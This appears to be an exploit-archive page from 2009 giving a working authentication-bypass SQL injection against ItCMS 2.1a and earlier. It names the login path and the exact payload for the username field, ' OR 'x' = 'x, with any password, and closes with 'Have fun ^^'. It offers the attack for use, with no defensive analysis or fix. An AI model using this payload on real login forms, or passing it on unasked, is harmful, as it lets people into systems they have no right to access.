[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : ItCMS <= 2.1a (Auth Bypass) SQL Injection Vulnerability
# Published : 2009-01-06
# Author : certaindeath
# Previous Title : Goople <= 1.8.2 (frontpage.php) Blind SQL Injection Exploit
# Next Title : playSMS 0.9.3 Multiple Remote/Local File Inclusion Vulnerabilities


__         .__            .___             __  .__     
  ____  ____________/  |______  |__| ____    __| _/____ _____ _/  |_|  |__  
_/ ___/ __ _  __    ____   |  |/      / __ |/ __ \__  \   __  |   
  __  ___/|  | /|  |  / __ |  |   |  / /_/   ___/ / __ |  | |   Y  
 ___  >___  >__|   |__| (____  /__|___|  /____ |___  >____  /__| |___|  /
     /    /                 /        /      /    /     /          / 
--+++~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+++--
--+++~~~~~ IT!CMS <= vers. SQL Injection Vulnerability ~~~~~+++--
--+++~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+++--
[+] Discovered by: certaindeath
[+] Exploit: simple SQL injection
[+] Path: [cms dir]/login.php
[+] Username: ' OR 'x' = 'x
[+] Password: anything
[+] Have fun ^^

# www.Syue.com [2009-01-06]